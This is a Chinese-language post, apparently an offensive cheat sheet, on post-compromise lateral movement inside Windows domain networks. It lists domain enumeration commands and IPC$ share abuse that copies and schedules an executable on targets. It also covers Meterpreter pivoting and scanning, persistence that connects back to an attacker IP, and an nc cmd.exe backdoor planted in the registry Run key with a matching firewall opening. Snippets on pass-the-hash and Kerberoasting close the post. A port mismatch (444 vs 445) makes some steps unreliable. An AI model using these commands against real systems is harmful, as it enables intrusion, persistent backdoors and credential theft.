有了內網的第一台機器的許可權後,就到了很關鍵的一步資訊收集,它也是內網滲透中不可或缺的一部分。
檢視當前機器的網路環境,收集域裡的相關資訊,包括所有的使用者、所有的計算機,以及相關關鍵組的資訊。
net user/domain:檢視域使用者
net view/domain:檢視有幾個域
net view/domain:***:檢視域內的主機
net group/domain:檢視域裡面的組
net group "domain computers"
/domain:檢視域內所有的主機名
net group "domain admins"
/domain:檢視域管理員
net group "domain controllers"
/domain:檢視域控制器
net group "enterprise admins"
/domain:檢視企業管理組
nettime/domain:檢視時間伺服器
通過以上可以獲得很多資訊,此時有兩種情況:
當前伺服器可以直接攻擊域伺服器和不可以直接攻擊域伺服器
不可以直接攻擊又分為兩種情況:
如果是許可權不夠就需要提公升許可權,如果是不能連線到域伺服器,則需要攻擊內網中某個可以連線到域伺服器的伺服器,然後以此做為跳板
現在許可權問題不可以直接攻擊域伺服器,可以採取以下方法繼續滲透:
即通過使用windows系統中預設啟動的ipc$共享獲得計算機控制權的入侵,在內網中極其常見。
d:>net use\127.0.0.1\ipc$ 連線127.0.0.1的ipc$共享
d:>copy srv.exe\127.0.0.1\ipc$ 複製srv.exe到目標機
d:>net time\127.0.0.1 查時間
d:>at \127.0.0.1 10:50 srv.exe 用at命令在10點50分啟動srv.exe
利用已經被入侵的邊緣機器作為跳板來攻擊網路中的其他機器
訪問由於路由問題而不能直接訪問的內網機器
run autoroute -s 192. 168.102. 0/24
run post/multi/manage/autoroute
掃瞄內網網路:
run post/windows/gather/arp_scanner rhosts = 192.168.102.0/24
use auxiliary/scanner/portscan/tcp
socket**
auxiliary/server/socks4a
proxy chains nmap 掃瞄
metsvc:
通過服務啟動
run metsvc -a #設定埠、上傳後門檔案
persistence:
通過啟動型啟動
特性:定期回連、系統啟動時回連、自動執行
run persistence -a -s -u -i 60 -p 4321 -r 192.168.1.101
nc後門
上傳nc:upload/root/nc.exe c:\\windows\\system32
修改登錄檔
列舉登錄檔鍵值:reg enumkey -k hklm\\software\\microsoft\\windows\\currentversion\\run
在當前主鍵下增加乙個nc鍵值:reg setval -k hklm\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -ldp 444 -e cmd.exe'
檢視nc鍵值:reg queryval -k hklm\\software\\microsoft\\windows\\currentversion\\run -v nc
設定防火牆
開啟乙個cmd的通道
execute -f cmd -i -h
檢視防火牆狀態
netsh firewall show opmode
新增防火牆規則允許444埠通過
netsh firewall add portopening tcp 445 "service firewall" enable
檢視埠狀態
netsh firewall show portopening
開始連線
nc -v ip port
windows內網滲透PTH PTK攻擊
windows內網滲透中,有三種最常用的pass系列攻擊 windows使用者hash主要由以下部分組成,其中ntlm hash比lm hash的安全性要更高 使用者名稱 rid lm hash值 ntlm hash值自windows vista和windows server 2008開始,wind...
域滲透 Kerberoasting攻擊
一 spn介紹 服務主體名稱 spn service principal names 是服務例項,可以將其理解為乙個服務 比如 http mssql 的唯一識別符號,服務在加入域中時是自動註冊的。如果在整個林或域中的計算機上安裝多個服務例項,則每個例項都必須具有自己的 spn。如果客戶端可能使用多個...
內網橫向滲透之PTH攻擊
當我們拿到內網某台作業系統許可權時,如何才能進行有效的橫向滲透操作呢?pth pass the hash 獲取域內單機密碼明文與hash 攻擊者已經獲得了內網某一台主機的控制許可權,利用該機作為跳板機,獲取內網域使用者密碼或者hash值,比如一些橫向移動的方法 雜湊傳遞攻擊 各種票據傳遞 票據許可權...